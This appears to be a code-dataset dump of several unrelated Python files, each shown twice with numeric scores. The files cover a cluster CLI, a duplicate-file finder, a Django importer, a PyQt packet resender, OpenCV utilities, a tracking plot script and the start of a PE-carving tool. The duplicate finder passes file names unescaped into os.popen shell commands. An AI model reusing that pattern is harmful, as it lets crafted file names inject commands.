print_hadoop_node_logs_p.add_argument('--node', '-n', help='The node to check the logs for.')
print_hadoop_node_logs_p.set_defaults(func=print_hadoop_node_logs_cmd)
# beeline-cli
subparsers.add_parser('beeline-cli', help='Launches a cli using beeline on the client node.') \
.set_defaults(func=beeline_cli_cmd)
# bash-cli
bash_cli_p = subparsers.add_parser('bash-cli', help='Launches bash cli on a single node in the' \
' cluster.')
bash_cli_p.add_argument('--node', '-n', help='The Docker service name of the node. Refer to the' \
' docker-compose.yml. Examples: "client", "nn1", "dn1", etc.')
bash_cli_p.set_defaults(func=bash_cli_cmd, node='client')
# sql-cli
sql_cli_p = subparsers.add_parser('sql-cli', help='Launches sqlcmd on the client' \
' node or locally.')
sql_cli_p.add_argument('--local', '-l', action='store_true', help='If specified, sqlcmd is' \
' launched on the host machine instead of the client node. Note: this requires sqlcmd to' \
' be on the environment PATH variable.')
sql_cli_p.set_defaults(func=sqlcmd_cli_cmd, local=False)
# sql-exec-query
sql_exec_query_p = subparsers.add_parser('sql-exec-query', help='Executes an SQL query.')
sql_exec_query_p.add_argument('--query', '-q', help='The sql query.')
sql_exec_query_p.add_argument('--database', '-d', help='The database to use.')
sql_exec_query_p.set_defaults(func=sql_exec_query_cmd, database='master')
# sql-exec-file
sql_exec_file_p = subparsers.add_parser('sql-exec-file', help='Executes an SQL file on the ' \
'client node.')
sql_exec_file_p.add_argument('--filename', '-f', help='The relative filename in the source dir.')
sql_exec_file_p.set_defaults(func=sql_exec_file_cmd)
# sqoop-export
sqoop_export_p = subparsers.add_parser('sqoop-export', help='Exports CSV files loaded in HDFS' \
' to the sql server node.')
#args.export_dir, args.sql_table, args.database_name, args.delimiter
sqoop_export_p.add_argument('--export-dir', '-e', help='The directory in HDFS which contains' \
' the CSV files.')
sqoop_export_p.add_argument('--sql-table', '-t', help='The name of the sql table to export to.' \
' Note: this table should already exist with the correct schema.')
sqoop_export_p.add_argument('--database-name', '-b', help='The name of the database to' \
' export to.')
sqoop_export_p.add_argument('--delimiter', '-d', help='The character used to for delimiting' \
' the values in the HDFS files.')
sqoop_export_p.set_defaults(func=sqoop_export_cmd, database_name='master', delimiter=',')
# local-sql-info
subparsers.add_parser('local-sql-info', help='Shows the connection information for connecting' \
' to the sql server from the parent host.').set_defaults(func=local_sql_info_cmd)
# launch-ssms
launch_ssms_p = subparsers.add_parser('launch-ssms', help='Note: Only works on Windows and' \
' requires installation of SQL Server Management Server. This command launches SQL Server' \
' Management Server using the local connection information.')
launch_ssms_p.add_argument('--executable-path', '-f')
launch_ssms_p.set_defaults(func=launch_ssms_win_local_cmd, executable_path= \
'C:\\Program Files (x86)\\Microsoft SQL Server Management Studio 18\\Common7\\IDE\\Ssms.exe')
# exec-hive-file
exec_hive_file_p = subparsers.add_parser('exec-hive-file', help='Executes a hive script from' \
' the src folder.')
exec_hive_file_p.add_argument('--src-path', '-f', help='The relative path to the file on the ' \
'linux node')
exec_hive_file_p.set_defaults(func=exec_hive_file_cmd)
# exec-hive-query
exec_hive_query_p = subparsers.add_parser('exec-hive-query', help='Executes a single' \
' hive query.')
exec_hive_query_p.add_argument('--query', '-e', help='The hive query string to execute.')
exec_hive_query_p.set_defaults(func=exec_hive_query_cmd)
# print-health
subparsers.add_parser('print-health', help='Prints the cluster health information.') \
.set_defaults(func=print_health_cmd)
# wait-for-healthy-nodes
wait_p = subparsers.add_parser('wait-for-healthy-nodes', help='Waits until the cluster is ' \
'healthy or until timeout.')
wait_p.add_argument('--timeout', '-t', help='The time in seconds until command timeout.')
wait_p.set_defaults(func=wait_for_healthy_nodes_cmd, timeout=200)
args = parser.parse_args()
if not args.func:
print('No subcommand selected. Use -h to get help.')
parser.print_usage()
return
config = configure(args)
args.func(config, args)
print('Program end.')
if __name__ == '__main__':
main() | 0.438545 | 0.101456 |
import os
def find_files_with_suffix(directory, suffix):
"""Takes 2 strings, directory and suffix
Searches the directory and all of its subdirectories and returns a
list of complete paths for all files with the given suffix"""
result = []
suffix_length = len(suffix)
for(root, dirs, files) in os.walk(directory):
for item in files:
if item.endswith(suffix):
result.append(os.path.join(root, item))
return result
def pipe(command):
"""Runs a unix command, returns result"""
fp = os.popen(command)
result = fp.read()
fp.close()
return result
def find_identical_checksums(directory, suffix):
"""Takes 2 strings, a directory path and a filename suffix
Returns a list of lists of filenames (with full path) that have
the same md5sum"""
result = []
md5_dict = dict()
t = find_files_with_suffix(directory, suffix)
for file in t:
res = pipe('md5sum ' + file)
md5sum = res.split(' ')[0]
if md5sum in md5_dict:
md5_dict[md5sum] += [file]
else:
md5_dict[md5sum] = [file]
for md5sum, files in md5_dict.items():
if len(files) > 1:
result.append(files)
return result
def find_duplicates(directory, suffix):
"""Recursively searches string 'directory' for files ending with string
'suffix'
Prints matching files with the same md5sum and whether the diff command
shows that they are identical"""
res = find_identical_checksums('test_mp3s', '.mp3')
for files in res:
for item1 in files:
for item2 in files:
if item1 < item2:
print('These 2 files have the same md5 sum:\n', item1, item2)
diff = pipe('diff '+ item1 + ' ' + item2)
if diff == '':
print('and they have the same contents')
else:
print('but have different contents!')
find_duplicates('test_mp3s', '.mp3') | Chapter14/ex14-3.py | import os
def find_files_with_suffix(directory, suffix):
"""Takes 2 strings, directory and suffix
Searches the directory and all of its subdirectories and returns a
list of complete paths for all files with the given suffix"""
result = []
suffix_length = len(suffix)
for(root, dirs, files) in os.walk(directory):
for item in files:
if item.endswith(suffix):
result.append(os.path.join(root, item))
return result
def pipe(command):
"""Runs a unix command, returns result"""
fp = os.popen(command)
result = fp.read()
fp.close()
return result
def find_identical_checksums(directory, suffix):
"""Takes 2 strings, a directory path and a filename suffix
Returns a list of lists of filenames (with full path) that have
the same md5sum"""
result = []
md5_dict = dict()
t = find_files_with_suffix(directory, suffix)
for file in t:
res = pipe('md5sum ' + file)
md5sum = res.split(' ')[0]
if md5sum in md5_dict:
md5_dict[md5sum] += [file]
else:
md5_dict[md5sum] = [file]
for md5sum, files in md5_dict.items():
if len(files) > 1:
result.append(files)
return result
def find_duplicates(directory, suffix):
"""Recursively searches string 'directory' for files ending with string
'suffix'
Prints matching files with the same md5sum and whether the diff command
shows that they are identical"""
res = find_identical_checksums('test_mp3s', '.mp3')
for files in res:
for item1 in files:
for item2 in files:
if item1 < item2:
print('These 2 files have the same md5 sum:\n', item1, item2)
diff = pipe('diff '+ item1 + ' ' + item2)
if diff == '':
print('and they have the same contents')
else:
print('but have different contents!')
find_duplicates('test_mp3s', '.mp3') | 0.479991 | 0.330444 |
import argparse
import json
import re
from django.core.management.base import BaseCommand
from translations_tool.translations.models import (
Directory,
Translation,
TranslationGroup,
)
PATTERN = re.compile(r"[a-zA-Z]")
class Command(BaseCommand):
help = "Imports translation from json data"
def add_arguments(self, parser):
parser.add_argument(
"path",
type=argparse.FileType("r"),
help="Path to the data file",
)
def handle(self, *args, **options):
file = options["path"]
data = json.loads(file.read())
print(len(data))
Translation.objects.all().delete()
TranslationGroup.objects.all().delete()
Directory.objects.all().delete()
count = len(data)
for i, row in enumerate(data, start=1):
key = (row["key"] or "").strip()
key_from_value = False
value = row["value_pl"].strip()
value_as_key = value.upper()
nonempty_value = PATTERN.search(value_as_key)
if not key and nonempty_value:
key = f"{value_as_key}_VALUE"
key_from_value = True
if not PATTERN.search(key) or not nonempty_value:
continue
print(f"{i}/{count}")
prev_group = None
for group_name in row["group"].split("."):
assert group_name
prev_group, created = TranslationGroup.objects.get_or_create(
name_en=group_name,
name_pl=group_name,
name_de=group_name,
name_ru=group_name,
parent=prev_group,
)
filepath = row["metadata"]["path"]
if not filepath:
continue
creation_kwargs = {
"key": key,
"value_pl": value,
"parent": prev_group,
"file": filepath,
"line": row["metadata"]["line"],
}
try:
translation = Translation.objects.get(key=key)
if not (key_from_value or translation.value_pl == value):
print("ALERT!!!", key, row)
raise
continue
except Translation.DoesNotExist:
pass
translation, _ = Translation.objects.get_or_create(**creation_kwargs)
parent = None
path = ""
*parts, last_part = filepath.strip("/").split("/")
for part in parts:
path += f"/{part}"
parent, _ = Directory.objects.get_or_create(name=part, path=path, parent=parent)
path += f"/{last_part}"
parent, _ = Directory.objects.get_or_create(name=last_part, path=path, parent=parent, leaf=True) | translations_tool/translations/management/commands/import_data.py | import argparse
import json
import re
from django.core.management.base import BaseCommand
from translations_tool.translations.models import (
Directory,
Translation,
TranslationGroup,
)
PATTERN = re.compile(r"[a-zA-Z]")
class Command(BaseCommand):
help = "Imports translation from json data"
def add_arguments(self, parser):
parser.add_argument(
"path",
type=argparse.FileType("r"),
help="Path to the data file",
)
def handle(self, *args, **options):
file = options["path"]
data = json.loads(file.read())
print(len(data))
Translation.objects.all().delete()
TranslationGroup.objects.all().delete()
Directory.objects.all().delete()
count = len(data)
for i, row in enumerate(data, start=1):
key = (row["key"] or "").strip()
key_from_value = False
value = row["value_pl"].strip()
value_as_key = value.upper()
nonempty_value = PATTERN.search(value_as_key)
if not key and nonempty_value:
key = f"{value_as_key}_VALUE"
key_from_value = True
if not PATTERN.search(key) or not nonempty_value:
continue
print(f"{i}/{count}")
prev_group = None
for group_name in row["group"].split("."):
assert group_name
prev_group, created = TranslationGroup.objects.get_or_create(
name_en=group_name,
name_pl=group_name,
name_de=group_name,
name_ru=group_name,
parent=prev_group,
)
filepath = row["metadata"]["path"]
if not filepath:
continue
creation_kwargs = {
"key": key,
"value_pl": value,
"parent": prev_group,
"file": filepath,
"line": row["metadata"]["line"],
}
try:
translation = Translation.objects.get(key=key)
if not (key_from_value or translation.value_pl == value):
print("ALERT!!!", key, row)
raise
continue
except Translation.DoesNotExist:
pass
translation, _ = Translation.objects.get_or_create(**creation_kwargs)
parent = None
path = ""
*parts, last_part = filepath.strip("/").split("/")
for part in parts:
path += f"/{part}"
parent, _ = Directory.objects.get_or_create(name=part, path=path, parent=parent)
path += f"/{last_part}"
parent, _ = Directory.objects.get_or_create(name=last_part, path=path, parent=parent, leaf=True) | 0.325735 | 0.124346 |
from PyQt5.QtCore import QObject
from PyQt5.QtCore import QByteArray
from PyQt5.QtCore import pyqtSlot
from PyQt5.QtNetwork import QTcpSocket
from PyQt5.QtNetwork import QAbstractSocket
from settings.netSettings import NetSettings
class _OutcomingConnection:
def __init__(self):
self.socketDescriptor = 0
self.socket = None
self.remoteAddress = ""
self.remotePort = 0
self.connected = False
self.dataPackets = list()
class ResenderEngine(QObject):
def __init__(self, parent=None, port=NetSettings.nodeDataPort):
super().__init__(parent)
self.__outcomingConnections = dict() # QMap<QString, OutcomingConnection>
self.__remoteAddresses = list() # Ip's
self.__hostAddress = '127.0.0.1' # address to omit
self.__remotePort = port
def __del__(self):
pass
# self.stop()
@pyqtSlot(list)
def setRemoteAddresses(self, addressList: list):
self.stop()
#print(addressList, "SET ADDDRESES")
self.__remoteAddresses = addressList
@pyqtSlot(str)
def setHostAddress(self, address: str):
self.__hostAddress = address
@pyqtSlot()
def stop(self):
for outcomingConnection in self.__outcomingConnections.values():
# outcomingConnection.socket.connected.disconnect()
# outcomingConnection.socket.disconnected.disconnect()
# outcomingConnection.socket.error.disconnect()
if outcomingConnection.connected:
outcomingConnection.socket.disconnectFromHost()
self.__outcomingConnections.clear()
@pyqtSlot(str, str)
def floodPacket(self, packet: str, addressToOmit=str()):
for address in self.__remoteAddresses:
#print("FLOOD", address, self.__hostAddress, addressToOmit)
if not len(address):
return
if address != addressToOmit and address != self.__hostAddress:
self.sendPacket(address, packet)
@pyqtSlot(str, str)
def sendPacket(self, address: str, packet: str):
#print("SEND_PACKET:", address, packet)
if not address:
return
outcomingConnection = self.__outcomingConnections.get(address, None)
if not outcomingConnection:
print("NO IN OUTCOME", address, len(address))
outcomingConnection = _OutcomingConnection()
outcomingConnection.dataPackets.append(packet.encode())
outcomingConnection.socket = QTcpSocket(self)
outcomingConnection.socket.setSocketOption(QAbstractSocket.LowDelayOption, 1)
outcomingConnection.socket.setSocketOption(QAbstractSocket.KeepAliveOption, 0)
outcomingConnection.socket.setObjectName(address)
outcomingConnection.socket.connected.connect(self.__newConnection)
outcomingConnection.socket.disconnected.connect(self.__disconnected)
outcomingConnection.socket.error.connect(self.__error)
outcomingConnection.remoteAddress = address
outcomingConnection.remotePort = self.__remotePort
outcomingConnection.socket.connectToHost(address, self.__remotePort)
self.__outcomingConnections[address] = outcomingConnection
#print("STARTED CON")
else:
if outcomingConnection.socket.state() == QAbstractSocket.ConnectedState:
outcomingConnection.dataPackets.append(packet.encode())
self._sendPackets(outcomingConnection)
else:
if outcomingConnection.socket.state() != QAbstractSocket.ConnectingState:
outcomingConnection.socket.disconnectFromHost()
outcomingConnection.socket.connectToHost(outcomingConnection.remoteAddress, self.__remotePort)
@pyqtSlot()
def __newConnection(self):
#print("NEW CONNECT TO")
socket = self.sender()
outcomingConnection = self.__outcomingConnections[socket.peerAddress().toString()]
# outcomingConnection.socketDescriptor = socket.socketDescriptor()
outcomingConnection.connected = True
socket.disconnected.connect(self.__disconnected)
self._sendPackets(outcomingConnection)
def _sendPackets(self, outcomingConnection: _OutcomingConnection):
#print("SEND PACKET 2")
if outcomingConnection.socket.state() == QAbstractSocket.ConnectedState:
#print("SEND PACKET 2 2")
packets = outcomingConnection.dataPackets
for packet in packets:
packetLength = len(packet)
bytesWritten = 0
while bytesWritten != 4:
bytesWritten += outcomingConnection.socket.writeData(packetLength.to_bytes(4, byteorder="little"))
bytesWritten = 0
while bytesWritten != packetLength:
bytesWritten += outcomingConnection.socket.writeData(packet)
outcomingConnection.socket.flush()
outcomingConnection.dataPackets.clear()
@pyqtSlot()
def __disconnected(self):
socket = self.sender()
outcomingConnection = self.__outcomingConnections.get(socket.objectName(), None)
if outcomingConnection:
outcomingConnection.connected = False
outcomingConnection.dataPackets.clear()
# outcomingConnection.commandPackets.clear()
# outcomingConnection.dSocket.disconnected.disconnect()
# outcomingConnection.cSocket.disconnected.disconnect()
@pyqtSlot()
def __error(self):
socket = self.sender()
print("ERROR", socket.errorString(), socket.objectName(), socket.peerAddress().toString()) | shardDesigner/shardTemplateDir/shardNodeDir/netTools/resender.py | from PyQt5.QtCore import QObject
from PyQt5.QtCore import QByteArray
from PyQt5.QtCore import pyqtSlot
from PyQt5.QtNetwork import QTcpSocket
from PyQt5.QtNetwork import QAbstractSocket
from settings.netSettings import NetSettings
class _OutcomingConnection:
def __init__(self):
self.socketDescriptor = 0
self.socket = None
self.remoteAddress = ""
self.remotePort = 0
self.connected = False
self.dataPackets = list()
class ResenderEngine(QObject):
def __init__(self, parent=None, port=NetSettings.nodeDataPort):
super().__init__(parent)
self.__outcomingConnections = dict() # QMap<QString, OutcomingConnection>
self.__remoteAddresses = list() # Ip's
self.__hostAddress = '127.0.0.1' # address to omit
self.__remotePort = port
def __del__(self):
pass
# self.stop()
@pyqtSlot(list)
def setRemoteAddresses(self, addressList: list):
self.stop()
#print(addressList, "SET ADDDRESES")
self.__remoteAddresses = addressList
@pyqtSlot(str)
def setHostAddress(self, address: str):
self.__hostAddress = address
@pyqtSlot()
def stop(self):
for outcomingConnection in self.__outcomingConnections.values():
# outcomingConnection.socket.connected.disconnect()
# outcomingConnection.socket.disconnected.disconnect()
# outcomingConnection.socket.error.disconnect()
if outcomingConnection.connected:
outcomingConnection.socket.disconnectFromHost()
self.__outcomingConnections.clear()
@pyqtSlot(str, str)
def floodPacket(self, packet: str, addressToOmit=str()):
for address in self.__remoteAddresses:
#print("FLOOD", address, self.__hostAddress, addressToOmit)
if not len(address):
return
if address != addressToOmit and address != self.__hostAddress:
self.sendPacket(address, packet)
@pyqtSlot(str, str)
def sendPacket(self, address: str, packet: str):
#print("SEND_PACKET:", address, packet)
if not address:
return
outcomingConnection = self.__outcomingConnections.get(address, None)
if not outcomingConnection:
print("NO IN OUTCOME", address, len(address))
outcomingConnection = _OutcomingConnection()
outcomingConnection.dataPackets.append(packet.encode())
outcomingConnection.socket = QTcpSocket(self)
outcomingConnection.socket.setSocketOption(QAbstractSocket.LowDelayOption, 1)
outcomingConnection.socket.setSocketOption(QAbstractSocket.KeepAliveOption, 0)
outcomingConnection.socket.setObjectName(address)
outcomingConnection.socket.connected.connect(self.__newConnection)
outcomingConnection.socket.disconnected.connect(self.__disconnected)
outcomingConnection.socket.error.connect(self.__error)
outcomingConnection.remoteAddress = address
outcomingConnection.remotePort = self.__remotePort
outcomingConnection.socket.connectToHost(address, self.__remotePort)
self.__outcomingConnections[address] = outcomingConnection
#print("STARTED CON")
else:
if outcomingConnection.socket.state() == QAbstractSocket.ConnectedState:
outcomingConnection.dataPackets.append(packet.encode())
self._sendPackets(outcomingConnection)
else:
if outcomingConnection.socket.state() != QAbstractSocket.ConnectingState:
outcomingConnection.socket.disconnectFromHost()
outcomingConnection.socket.connectToHost(outcomingConnection.remoteAddress, self.__remotePort)
@pyqtSlot()
def __newConnection(self):
#print("NEW CONNECT TO")
socket = self.sender()
outcomingConnection = self.__outcomingConnections[socket.peerAddress().toString()]
# outcomingConnection.socketDescriptor = socket.socketDescriptor()
outcomingConnection.connected = True
socket.disconnected.connect(self.__disconnected)
self._sendPackets(outcomingConnection)
def _sendPackets(self, outcomingConnection: _OutcomingConnection):
#print("SEND PACKET 2")
if outcomingConnection.socket.state() == QAbstractSocket.ConnectedState:
#print("SEND PACKET 2 2")
packets = outcomingConnection.dataPackets
for packet in packets:
packetLength = len(packet)
bytesWritten = 0
while bytesWritten != 4:
bytesWritten += outcomingConnection.socket.writeData(packetLength.to_bytes(4, byteorder="little"))
bytesWritten = 0
while bytesWritten != packetLength:
bytesWritten += outcomingConnection.socket.writeData(packet)
outcomingConnection.socket.flush()
outcomingConnection.dataPackets.clear()
@pyqtSlot()
def __disconnected(self):
socket = self.sender()
outcomingConnection = self.__outcomingConnections.get(socket.objectName(), None)
if outcomingConnection:
outcomingConnection.connected = False
outcomingConnection.dataPackets.clear()
# outcomingConnection.commandPackets.clear()
# outcomingConnection.dSocket.disconnected.disconnect()
# outcomingConnection.cSocket.disconnected.disconnect()
@pyqtSlot()
def __error(self):
socket = self.sender()
print("ERROR", socket.errorString(), socket.objectName(), socket.peerAddress().toString()) | 0.289472 | 0.066055 |
import cv2
import numpy as np
def get_image_mask(input_img, hsv_lower, hsv_upper):
# define the lower and upper boundaries of the "green"
# ball in the HSV color space, then initialize the
# list of tracked points
# hsv_lower = (67, 0, 0)
# hsv_upper = (86, 255, 255)
hsv_img = cv2.cvtColor(input_img, cv2.COLOR_BGR2HSV)
#cv2.imwrite("androhvs.jpeg", hsv_img)
# construct a mask for the color "green", then perform
# a series of dilations and erosions to remove any small
# blobs left in the mask
img_mask = cv2.inRange(hsv_img, hsv_lower, hsv_upper)
return img_mask
def get_contours(input_img, min_contour_area=10.0):
contour, hier = cv2.findContours(input_img, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
contour_info = []
num_nonzeroarea_cnts = 0
num_zeroarea_cnts = 0
for c in contour:
if cv2.contourArea(c) >= min_contour_area:
num_nonzeroarea_cnts += 1
# compute the center of the contour
M = cv2.moments(c)
cX = int(M["m10"] / M["m00"])
cY = int(M["m01"] / M["m00"])
contour_info.append(
(
c,
np.array([[[cX, cY]]]),
cv2.isContourConvex(c),
cv2.contourArea(c),
)
)
else:
num_zeroarea_cnts += 1
return contour_info
def draw_contours(
input_img, contours_list, color=(0, 0, 255), thickness=1, debug=False
):
output_img = input_img.copy()
for idx, c_info in enumerate(contours_list):
cv2.drawContours(output_img, [c_info[0]], 0, color, thickness)
return output_img
def draw_contours_straight(
input_img, contours_list, color=(0, 0, 255), thickness=1, debug=False
):
output_img = input_img.copy()
for idx, c_info in enumerate(contours_list):
cv2.drawContours(output_img, [c_info], 0, color, thickness)
return output_img
def load_centers(image_name):
img = cv2.imread(image_name)
mask = get_image_mask(img, (255, 255, 255), (255, 255, 255))
contours = get_contours(mask, min_contour_area=1)
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# cv2.imwrite(f'{image_name}_grey.jpeg', gray)
# cv.bilateralFilter() is highly effective in noise removal while keeping edges sharp
blurred = cv2.bilateralFilter(gray, 5, 15, 15)
canny_img = cv2.Canny(gray, 30, 150)
# cv2.imwrite(f'{image_name}_canny.jpeg', canny_img)
# edge detection filter
kernel = np.array([[0.0, -1.0, 0.0], [-1.0, 5.0, -1.0], [0.0, -1.0, 0.0]])
kernel = kernel / (np.sum(kernel) if np.sum(kernel) != 0 else 1)
# filter the source image
img_rst = cv2.filter2D(img, -1, kernel)
# cv2.imwrite(f'{image_name}_hpass.jpeg', img_rst)
ret, thresh_img = cv2.threshold(gray, 200, 255, cv2.THRESH_BINARY)
# cv2.imwrite(f'{image_name}_thres.jpeg', thresh_img)
contours = get_contours(thresh_img, min_contour_area=1)
circles = draw_contours(mask, contours, color=(255, 255, 255), thickness=1)
# cv2.imwrite(f'/tmp/tmp_circles.jpeg', circles)
centers = list(map(lambda x: x[1], contours))
centers = np.array(centers).reshape(len(centers), 2)
sizes = np.array(list(map(lambda x: x[3], contours)))
cimage = draw_contours_straight(
mask,
centers.reshape(len(centers), 1, 1, 2),
color=(255, 255, 255),
thickness=10,
)
# cv2.imwrite(f'{image_name}_centers.jpeg', cimage)
return centers, sizes | art/blips/processor.py | import cv2
import numpy as np
def get_image_mask(input_img, hsv_lower, hsv_upper):
# define the lower and upper boundaries of the "green"
# ball in the HSV color space, then initialize the
# list of tracked points
# hsv_lower = (67, 0, 0)
# hsv_upper = (86, 255, 255)
hsv_img = cv2.cvtColor(input_img, cv2.COLOR_BGR2HSV)
#cv2.imwrite("androhvs.jpeg", hsv_img)
# construct a mask for the color "green", then perform
# a series of dilations and erosions to remove any small
# blobs left in the mask
img_mask = cv2.inRange(hsv_img, hsv_lower, hsv_upper)
return img_mask
def get_contours(input_img, min_contour_area=10.0):
contour, hier = cv2.findContours(input_img, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
contour_info = []
num_nonzeroarea_cnts = 0
num_zeroarea_cnts = 0
for c in contour:
if cv2.contourArea(c) >= min_contour_area:
num_nonzeroarea_cnts += 1
# compute the center of the contour
M = cv2.moments(c)
cX = int(M["m10"] / M["m00"])
cY = int(M["m01"] / M["m00"])
contour_info.append(
(
c,
np.array([[[cX, cY]]]),
cv2.isContourConvex(c),
cv2.contourArea(c),
)
)
else:
num_zeroarea_cnts += 1
return contour_info
def draw_contours(
input_img, contours_list, color=(0, 0, 255), thickness=1, debug=False
):
output_img = input_img.copy()
for idx, c_info in enumerate(contours_list):
cv2.drawContours(output_img, [c_info[0]], 0, color, thickness)
return output_img
def draw_contours_straight(
input_img, contours_list, color=(0, 0, 255), thickness=1, debug=False
):
output_img = input_img.copy()
for idx, c_info in enumerate(contours_list):
cv2.drawContours(output_img, [c_info], 0, color, thickness)
return output_img
def load_centers(image_name):
img = cv2.imread(image_name)
mask = get_image_mask(img, (255, 255, 255), (255, 255, 255))
contours = get_contours(mask, min_contour_area=1)
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# cv2.imwrite(f'{image_name}_grey.jpeg', gray)
# cv.bilateralFilter() is highly effective in noise removal while keeping edges sharp
blurred = cv2.bilateralFilter(gray, 5, 15, 15)
canny_img = cv2.Canny(gray, 30, 150)
# cv2.imwrite(f'{image_name}_canny.jpeg', canny_img)
# edge detection filter
kernel = np.array([[0.0, -1.0, 0.0], [-1.0, 5.0, -1.0], [0.0, -1.0, 0.0]])
kernel = kernel / (np.sum(kernel) if np.sum(kernel) != 0 else 1)
# filter the source image
img_rst = cv2.filter2D(img, -1, kernel)
# cv2.imwrite(f'{image_name}_hpass.jpeg', img_rst)
ret, thresh_img = cv2.threshold(gray, 200, 255, cv2.THRESH_BINARY)
# cv2.imwrite(f'{image_name}_thres.jpeg', thresh_img)
contours = get_contours(thresh_img, min_contour_area=1)
circles = draw_contours(mask, contours, color=(255, 255, 255), thickness=1)
# cv2.imwrite(f'/tmp/tmp_circles.jpeg', circles)
centers = list(map(lambda x: x[1], contours))
centers = np.array(centers).reshape(len(centers), 2)
sizes = np.array(list(map(lambda x: x[3], contours)))
cimage = draw_contours_straight(
mask,
centers.reshape(len(centers), 1, 1, 2),
color=(255, 255, 255),
thickness=10,
)
# cv2.imwrite(f'{image_name}_centers.jpeg', cimage)
return centers, sizes | 0.533397 | 0.388763 |
import os, sys
import pickle
from PIL import Image, ImageDraw
import torch as tc
from torchvision import transforms
sys.path.append("../../")
sys.path.append("otb")
from data.otb import *
from otb.forecasters import load_forecaster_full, load_forecaster
from conf_set.conf_set import ConfSetReg as ConfSetModel
def xyxy2xywh(xyxy):
xywh = xyxy.clone()
xywh[:, 2:] = xyxy[:, 2:] - xyxy[:, :2]
return xywh
if __name__ == "__main__":
## parameters
dsld = loadOTB("datasets/otb", 100, bb_format="xyxy")
cs_root = "otb/snapshots/pac_conf_set"
plot_root = "otb/plot_conf_set"
n = 5000
eps = 0.01
delta = 1e-5
n_plots = float('inf')
## init
os.makedirs(plot_root, exist_ok=True)
# load a forecaster
F_precomp = load_forecaster(None)
assert(F_precomp.load(os.path.join(cs_root, "F_cal/model_params_cal")))
print(F_precomp)
F = load_forecaster_full()
F.T.data = F_precomp.T
print(F.cal_parameters())
F.cuda()
F.eval()
print(F)
## load a confidence set
C_precomp = ConfSetModel(F_precomp, eps, delta, n)
C_precomp.load_cs(cs_root, 'cs') ## main results
C = ConfSetModel(F, eps, delta, n)
C.T = C_precomp.T
C.eval()
print(C.T)
## predict a confidence set for tracking
i = 0
for xs, ys in dsld.tracking:
seq_ids = xs[-2]
frame_ids = xs[-1]
xs = [xs[0], xs[1], xs[4]]
xs = [x.cuda() for x in xs]
ys = ys.cuda()
## original prediction
yhs_ori, _ = C.model_F.baseF(xs)
opts = C.model_F.baseF.opts
yhs_ori = C.model_F.baseF.decode_output(xs, yhs_ori, opts)
## cs prediction
lb, ub = C(xs)
bb_ovap = tc.cat((lb[:, :2], ub[:, 2:]), 1)
opts = C.model_F.baseF.opts
yhs_cs_ovap = C.model_F.baseF.decode_output(xs, bb_ovap, opts)
for x, y, seq_id, frame_id, y_ori, y_cs in zip(xs[2].detach().cpu(), ys.detach().cpu(), seq_ids, frame_ids, yhs_ori.detach().cpu(), yhs_cs_ovap.detach().cpu()):
x_pil = transforms.ToPILImage()(x)
draw = ImageDraw.Draw(x_pil)
draw.rectangle(y.tolist(), outline="white", width=2)
draw.rectangle(y_ori.tolist(), outline="red", width=2)
draw.rectangle(y_cs.tolist(), outline="green", width=5)
fn = os.path.join(plot_root, "%s_%.4d.png"%(seq_id, frame_id))
x_pil.save(fn)
i += 1
if i > n_plots:
break
if i > n_plots:
break | demo/conf_set/otb/plot_conf_set.py | import os, sys
import pickle
from PIL import Image, ImageDraw
import torch as tc
from torchvision import transforms
sys.path.append("../../")
sys.path.append("otb")
from data.otb import *
from otb.forecasters import load_forecaster_full, load_forecaster
from conf_set.conf_set import ConfSetReg as ConfSetModel
def xyxy2xywh(xyxy):
xywh = xyxy.clone()
xywh[:, 2:] = xyxy[:, 2:] - xyxy[:, :2]
return xywh
if __name__ == "__main__":
## parameters
dsld = loadOTB("datasets/otb", 100, bb_format="xyxy")
cs_root = "otb/snapshots/pac_conf_set"
plot_root = "otb/plot_conf_set"
n = 5000
eps = 0.01
delta = 1e-5
n_plots = float('inf')
## init
os.makedirs(plot_root, exist_ok=True)
# load a forecaster
F_precomp = load_forecaster(None)
assert(F_precomp.load(os.path.join(cs_root, "F_cal/model_params_cal")))
print(F_precomp)
F = load_forecaster_full()
F.T.data = F_precomp.T
print(F.cal_parameters())
F.cuda()
F.eval()
print(F)
## load a confidence set
C_precomp = ConfSetModel(F_precomp, eps, delta, n)
C_precomp.load_cs(cs_root, 'cs') ## main results
C = ConfSetModel(F, eps, delta, n)
C.T = C_precomp.T
C.eval()
print(C.T)
## predict a confidence set for tracking
i = 0
for xs, ys in dsld.tracking:
seq_ids = xs[-2]
frame_ids = xs[-1]
xs = [xs[0], xs[1], xs[4]]
xs = [x.cuda() for x in xs]
ys = ys.cuda()
## original prediction
yhs_ori, _ = C.model_F.baseF(xs)
opts = C.model_F.baseF.opts
yhs_ori = C.model_F.baseF.decode_output(xs, yhs_ori, opts)
## cs prediction
lb, ub = C(xs)
bb_ovap = tc.cat((lb[:, :2], ub[:, 2:]), 1)
opts = C.model_F.baseF.opts
yhs_cs_ovap = C.model_F.baseF.decode_output(xs, bb_ovap, opts)
for x, y, seq_id, frame_id, y_ori, y_cs in zip(xs[2].detach().cpu(), ys.detach().cpu(), seq_ids, frame_ids, yhs_ori.detach().cpu(), yhs_cs_ovap.detach().cpu()):
x_pil = transforms.ToPILImage()(x)
draw = ImageDraw.Draw(x_pil)
draw.rectangle(y.tolist(), outline="white", width=2)
draw.rectangle(y_ori.tolist(), outline="red", width=2)
draw.rectangle(y_cs.tolist(), outline="green", width=5)
fn = os.path.join(plot_root, "%s_%.4d.png"%(seq_id, frame_id))
x_pil.save(fn)
i += 1
if i > n_plots:
break
if i > n_plots:
break | 0.398406 | 0.39321 |
import argparse
import bitstring # Used to parse data. Download from: http://code.google.com/p/python-bitstring/
import os
import pefile # Used to parse PE header. Download from: http://code.google.com/p/pefile/
import sys
from datetime import datetime
g_log = ''
def file_exists(fname):
return os.path.exists(fname) and os.access(fname, os.R_OK)
def log(string):
# This just tees output to a file and stdout
if g_log:
try:
open(g_log, 'a').write(string + '\n')
except:
pass
def getSize_FromPE(PE_data):
# Performs basic lookup to find the end of an EXE, based upon the
# size of PE sections. Same algorithm is used to find EXE overlay
# FYI: This will miss any overlay data, such as RAR SFX archives, etc
try:
pe = pefile.PE(data=PE_data)
return pe.sections[-1].PointerToRawData + pe.sections[-1].SizeOfRawData
except:
return 0
def getArgs():
global g_log
parser = argparse.ArgumentParser()
